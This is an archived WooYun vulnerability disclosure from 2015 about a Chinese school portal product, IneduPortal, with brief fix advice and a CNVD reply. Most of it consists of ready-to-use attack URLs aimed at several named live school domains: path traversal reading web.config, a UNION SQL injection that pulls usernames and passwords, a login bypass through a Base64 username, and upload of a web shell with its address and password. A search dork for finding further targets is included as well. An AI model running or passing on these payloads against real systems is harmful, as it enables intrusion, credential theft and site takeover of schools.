当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118564

漏洞标题:某教育通用应用任意文件读取AND注入AND奇葩登陆以及拿shell

相关厂商:cncert国家互联网应急中心

漏洞作者: Damo

提交时间:2015-06-08 10:12

修复时间:2015-09-10 13:44

公开时间:2015-09-10 13:44

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-08: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向第三方安全合作伙伴开放
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

问题出现在今天晚上

详细说明:

百度关键字:inurl:ineduportal
这里以http://www.fhez.cn测试
程序包括内部OA ERP 和考试系统 数据库连接地址
1、任意文件读取:

http://www.fhez.cn/IneduPortal/Components/news/FileDown.aspx?OldName=保存文件名.txt&NewName=../web.config


QQ截图20150606013806.png


2、注入

http://www.fhez.cn/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111 union all select top 1 1,2,STUFF(login_password,1,0,login_name)  from InforLogin--


33.png


3、奇葩登陆

http://www.fhez.cn/ineduportal/login.aspx?SysUid=YWRtaW4=


SysUid参数为 Base64加密后的用户登录名称 至于用户名可以在新闻详细页底部看到录入人 系统管理员为admin 其他则为拼音首字母或全拼
4、拿SHELL
登陆后访问后台http://www.fhez.cn/ineduportal/Admin/manage.aspx
随便找个可以上传附件的新闻 上传附件即可
然后在前台查看新闻即可得到文件上传后的名称 访问下面地址即可

http://www.fhez.cn/ineduportal/UpSource/news/annexs/2015060600306790_1.aspx   密码admin  (望删除)


11.png

22.png


1、读取:http://www.jianlan.com.cn/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.jianlan.com.cn/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.jianlan.com.cn/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
2、读取:http://www.hzchyx.com/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.hzchyx.com/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.hzchyx.com/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
3、读取:http://www.shidaiedu.cn/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.shidaiedu.cn/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.shidaiedu.cn/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
4、读取:http://www.hzpjxx.net/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.hzpjxx.net/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.hzpjxx.net/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
5、读取:http://www.hshz.com/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.hshz.com/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.hshz.com/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
更多案例请参考百度关键字结果这里就不一一列举了

漏洞证明:

详细信息中的截图以及下面的案例

1、读取:http://www.jianlan.com.cn/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.jianlan.com.cn/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.jianlan.com.cn/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
2、读取:http://www.hzchyx.com/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.hzchyx.com/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.hzchyx.com/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
3、读取:http://www.shidaiedu.cn/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.shidaiedu.cn/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.shidaiedu.cn/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
4、读取:http://www.hzpjxx.net/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.hzpjxx.net/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.hzpjxx.net/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
5、读取:http://www.hshz.com/IneduPortal/Components/news/FileDown.aspx?OldName=aaa.txt&NewName=../web.config
注入:http://www.hshz.com/ineduportal/Components/HistoryToDay/historyinfo.aspx?id=1&HTid=11111111111%20union%20all%20select%20top%201%201,2,STUFF%28login_password,1,0,login_name%29%20%20from%20InforLogin--
登陆:http://www.hshz.com/ineduportal/login.aspx?SysUid=YWRtaW4= (登录后访问/ineduportal/Admin/manage.aspx进入后台)
SHELL:案例就不上传了
更多案例请参考百度关键字结果这里就不一一列举了

修复方案:

1任意文件下载:虽然在web.config下面设置了某些文件夹的访问权限,但是程序读取是没有限制的,建议加上限制或者最简单的方式就是用流输出的之前加上指定文件夹或者文件判断
2注入:就过滤吧 另外参数转换类型也可以
3登陆:虽然想做成类似单点登陆,但是也得注意过期时间之类的 等等以及用用户名直接B64也忒简单了点吧
4、SHELL:过滤格式

版权声明:转载请注明来源 Damo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-12 13:43

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无